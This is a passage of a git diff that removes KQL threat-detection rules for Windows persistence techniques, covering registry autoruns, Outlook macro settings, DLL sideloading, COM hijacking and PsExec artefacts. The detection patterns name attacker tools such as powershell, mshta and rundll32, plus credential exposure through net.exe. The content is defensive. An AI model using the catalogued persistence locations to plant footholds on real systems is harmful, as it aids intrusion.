"\\Excel\\Addins\\NativeShim" or RegistryKey contains "\\Excel\\Addins\\NativeShim.InquireConnector.1" or RegistryKey contains "\\Excel\\Addins\\PowerPivotExcelClientAddIn.NativeEntry.1" or RegistryKey contains "\\Outlook\\AddIns\\AccessAddin.DC" or RegistryKey contains "\\Outlook\\AddIns\\ColleagueImport.ColleagueImportAddin" or RegistryKey contains "\\Outlook\\AddIns\\EvernoteCC.EvernoteContactConnector" or RegistryKey contains 
"\\Outlook\\AddIns\\EvernoteOLRD.Connect" or RegistryKey contains "\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1" or RegistryKey contains "\\Outlook\\Addins\\OcOffice.OcForms" or RegistryKey contains "\\Outlook\\Addins\\OneNote.OutlookAddin" or RegistryKey contains "\\Outlook\\Addins\\OscAddin.Connect" or RegistryKey contains "\\Outlook\\Addins\\OutlookChangeNotifier.Connect" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.LyncAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.UCAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UmOutlookAddin.FormRegionAddin")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))))
\ No newline at end of file
diff --git a/Persistence/OilRig_APT_Registry_Persistence.kql b/Persistence/OilRig_APT_Registry_Persistence.kql
deleted file mode 100644
index 83beccff..00000000
--- a/Persistence/OilRig_APT_Registry_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
-// Date: 2018/03/23
-// Level: critical
-// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
-// Tags: attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense_evasion, attack.t1112, attack.command_and_control, attack.t1071.004
-DeviceRegistryEvents
-| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT"
\ No newline at end of file
diff --git a/Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql b/Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql
deleted file mode 100644
index 2f3f3dd3..00000000
--- a/Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @ScoubiMtl
-// Date: 2021/04/05
-// Level: high
-// Description: Detects the modification of Outlook security setting to allow unprompted execution of macros.
-// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546
-DeviceRegistryEvents
-| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\Security\\Level"
\ No newline at end of file
diff --git a/Persistence/Outlook_Security_Settings_Updated_-_Registry.kql b/Persistence/Outlook_Security_Settings_Updated_-_Registry.kql
deleted file mode 100644
index 88473077..00000000
--- a/Persistence/Outlook_Security_Settings_Updated_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/28
-// Level: medium
-// Description: Detects changes to the registry values related to outlook security settings
-// Tags: attack.persistence, attack.t1137
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Office" and RegistryKey contains "\\Outlook\\Security"
\ No newline at end of file
diff --git a/Persistence/PSEXEC_Remote_Execution_File_Artefact.kql b/Persistence/PSEXEC_Remote_Execution_File_Artefact.kql
deleted file mode 100644
index 67f96f11..00000000
--- a/Persistence/PSEXEC_Remote_Execution_File_Artefact.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/21
-// Level: high
-// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-"
\ No newline at end of file
diff --git a/Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql
deleted file mode 100644
index 5662813f..00000000
--- a/Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/Persistence/Path_To_Screensaver_Binary_Modified.kql b/Persistence/Path_To_Screensaver_Binary_Modified.kql
deleted file mode 100644
index 0e968bc4..00000000
--- a/Persistence/Path_To_Screensaver_Binary_Modified.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bartlomiej Czyz @bczyz1, oscd.community
-// Date: 2020/10/11
-// Level: medium
-// Description: Detects value modification of registry key containing path to binary used as screensaver.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe")))
\ No newline at end of file
diff --git a/Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql b/Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql
deleted file mode 100644
index f6b54c27..00000000
--- a/Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql
+++ /dev/null
@@ -1,13 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.
-The disk cleanup manager is part of the operating system.
-It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
-Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
-Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
-Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
-
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Autorun") or ((RegistryValueData contains "cmd" or RegistryValueData contains "powershell" or RegistryValueData contains "rundll32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains "wsl" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\TEMP\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") and (RegistryKey contains "\\CleanupString" or RegistryKey contains "\\PreCleanupString")))
\ No newline at end of file
diff --git a/Persistence/Persistence_Via_Hhctrl.ocx.kql b/Persistence/Persistence_Via_Hhctrl.ocx.kql
deleted file mode 100644
index 288132ef..00000000
--- a/Persistence/Persistence_Via_Hhctrl.ocx.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)" and (not(RegistryValueData =~ "C:\\Windows\\System32\\hhctrl.ocx"))
\ No newline at end of file
diff --git a/Persistence/Persistence_Via_New_SIP_Provider.kql b/Persistence/Persistence_Via_New_SIP_Provider.kql
deleted file mode 100644
index 08cf0096..00000000
--- a/Persistence/Persistence_Via_New_SIP_Provider.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
-// Tags: attack.persistence, attack.defense_evasion, attack.t1553.003
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll"))))
\ No newline at end of file
diff --git a/Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql b/Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql
deleted file mode 100644
index c30822e7..00000000
--- a/Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/22
-// Level: medium
-// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt
-// Tags: attack.persistence
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths"
\ No newline at end of file
diff --git a/Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql b/Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql
deleted file mode 100644
index 8867fa02..00000000
--- a/Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov
-// Date: 2019/10/26
-// Level: high
-// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\sc.exe" and ProcessIntegrityLevel =~ "Medium") and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command"))
\ No newline at end of file
diff --git a/Persistence/Potential_7za.DLL_Sideloading.kql b/Persistence/Potential_7za.DLL_Sideloading.kql
deleted file mode 100644
index f1cc961b..00000000
--- a/Persistence/Potential_7za.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/06/09
-// Level: low
-// Description: Detects potential DLL sideloading of "7za.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql b/Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql
deleted file mode 100644
index 6eca1244..00000000
--- a/Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Muhammad Faisal
-// Date: 2023/08/02
-// Level: medium
-// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
-// Tags: attack.command_and_control, attack.persistence, attack.t1219
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "\\amazon-ssm-agent.exe"
\ No newline at end of file
diff --git a/Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql b/Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql
deleted file mode 100644
index 000b03f0..00000000
--- a/Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\log.dll" and (not(((FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\")))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend 
Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql b/Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql
deleted file mode 100644
index af503f0f..00000000
--- a/Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/17
-// Level: medium
-// Description: Detects PowerShell creating a binary executable or a script file.
-// Tags: attack.persistence
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".ocx" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")) and (not((((FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Windows\\Temp\\") or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_CCleanerDU.DLL_Sideloading.kql b/Persistence/Potential_CCleanerDU.DLL_Sideloading.kql
deleted file mode 100644
index 1c5d0f3d..00000000
--- a/Persistence/Potential_CCleanerDU.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerDU.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql b/Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql
deleted file mode 100644
index 7d335d90..00000000
--- a/Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql b/Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql
deleted file mode 100644
index c814590c..00000000
--- a/Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kutepov Anton, oscd.community
-// Date: 2019/10/23
-// Level: medium
-// Description: Detects COM object hijacking via TreatAs subkey
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "HKU" and RegistryKey contains "Classes\\CLSID" and RegistryKey contains "\\TreatAs")) and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe"))
\ No newline at end of file
diff --git a/Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql b/Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql
deleted file mode 100644
index 4ca5d408..00000000
--- a/Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\"))
\ No newline at end of file
diff --git a/Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql b/Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql
deleted file mode 100644
index 7d53df8f..00000000
--- a/Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbgcore.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll"))
\ No newline at end of file
diff --git a/Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql b/Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql
deleted file mode 100644
index 85e52e34..00000000
--- a/Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbghelp.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll"))))
\ No newline at end of file
diff --git a/Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql b/Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql
deleted file mode 100644
index bafb67b9..00000000
--- a/Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe"))
\ No newline at end of file
diff --git a/Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql b/Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql
deleted file mode 100644
index d6f4a3c3..00000000
--- a/Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/13
-// Level: medium
-// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\"))
\ No newline at end of file
diff --git a/Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql b/Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql
deleted file mode 100644
index 4d8a43ae..00000000
--- a/Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/14
-// Level: medium
-// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\"))
\ No newline at end of file
diff --git a/Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql b/Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql
deleted file mode 100644
index 05e33118..00000000
--- a/Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\")
\ No newline at end of file
diff --git a/Persistence/Potential_Libvlc.DLL_Sideloading.kql b/Persistence/Potential_Libvlc.DLL_Sideloading.kql
deleted file mode 100644
index 3fce189b..00000000
--- a/Persistence/Potential_Libvlc.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\")))
\ No newline at end of file
diff --git a/Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql b/Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql
deleted file mode 100644
index ac641f11..00000000
--- a/Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk
-// Date: 2023/06/07
-// Level: high
-// Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where RegistryKey endswith "\\CLSID\\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\\InProcServer32\\(Default)" and (not((RegistryValueData in~ ("%windir%\\System32\\ActXPrxy.dll", "C:\\Windows\\System32\\ActXPrxy.dll"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql b/Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql
deleted file mode 100644
index 959bd914..00000000
--- a/Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/09
-// Level: medium
-// Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence
-The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
-
-// Tags: attack.persistence
-DeviceFileEvents
-| where FolderPath endswith "\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql b/Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql
deleted file mode 100644
index bfd40122..00000000
--- a/Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/09/29
-// Level: medium
-// Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
-// Tags: attack.persistence, attack.t1543.003, attack.t1574.011
-DeviceProcessEvents
